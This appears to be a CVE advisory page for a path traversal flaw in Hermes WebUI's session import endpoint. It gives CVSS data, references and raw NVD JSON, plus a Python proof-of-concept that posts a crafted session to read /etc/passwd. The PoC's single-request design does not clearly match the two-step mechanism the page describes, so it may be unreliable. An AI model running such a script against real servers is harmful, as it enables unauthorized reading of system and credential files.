CVE-2026-22677

Description

Hermes WebUI prior to 0.51.44 - Release T contains a path traversal vulnerability in the session import endpoint that allows authenticated attackers to read arbitrary files by importing a crafted session with an unrestricted workspace value. Attackers can supply a blocked filesystem root in the workspace field and subsequently use relative paths in the session file API to access any file readable by the WebUI process.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Hermes WebUI < 0.51.44

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import json

# Target URL (Replace with actual target)
target_url = "http://localhost:8080/api/sessions/import"

# Attacker credentials (Low privilege required)
username = "attacker"
password = "password"

# Crafted session payload exploiting path traversal
# The workspace is set to the root filesystem
# The path uses relative traversal to access sensitive files
payload = {
    "session": {
        "workspace": "/", 
        "files": [
            {
                # Using relative path to escape and read /etc/passwd
                "path": "../../../../../../../../etc/passwd",
                "operation": "read"
            }
        ]
    }
}

try:
    response = requests.post(
        target_url,
        auth=(username, password),
        json=payload,
        headers={"Content-Type": "application/json"}
    )

    if response.status_code == 200:
        print("[+] Exploit successful!")
        print("[+] Response:")
        print(response.json())
    else:
        print(f"[-] Exploit failed with status code: {response.status_code}")
        print(response.text)

except Exception as e:
    print(f"[-] An error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-22677
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-22677
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-22677/
[4] VulDB https://vuldb.com/cve/CVE-2026-22677
[5] https://github.com/nesquena/hermes-webui/commit/f00cb74f776f22f02f5eb6b39dfb389f87cc7fd3
[6] https://github.com/nesquena/hermes-webui/pull/2048
[7] https://github.com/nesquena/hermes-webui/releases/tag/v0.51.44
[8] https://www.vulncheck.com/advisories/hermes-webui-path-traversal-via-session-import-endpoint
[9] https://github.com/nesquena/hermes-webui/pull/2048

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-22677", "sourceIdentifier": "[email protected]", "published": "2026-05-13T19:17:04.347", "lastModified": "2026-05-14T16:24:56.240", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Hermes WebUI prior to 0.51.44 - Release T contains a path traversal vulnerability in the session import endpoint that allows authenticated attackers to read arbitrary files by importing a crafted session with an unrestricted workspace value. Attackers can supply a blocked filesystem root in the workspace field and subsequently use relative paths in the session file API to access any file readable by the WebUI process."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://github.com/nesquena/hermes-webui/commit/f00cb74f776f22f02f5eb6b39dfb389f87cc7fd3", "source": "[email protected]"}, {"url": "https://github.com/nesquena/hermes-webui/pull/2048", "source": "[email protected]"}, {"url": "https://github.com/nesquena/hermes-webui/releases/tag/v0.51.44", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/hermes-webui-path-traversal-via-session-import-endpoint", "source": "[email protected]"}, {"url": "https://github.com/nesquena/hermes-webui/pull/2048", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}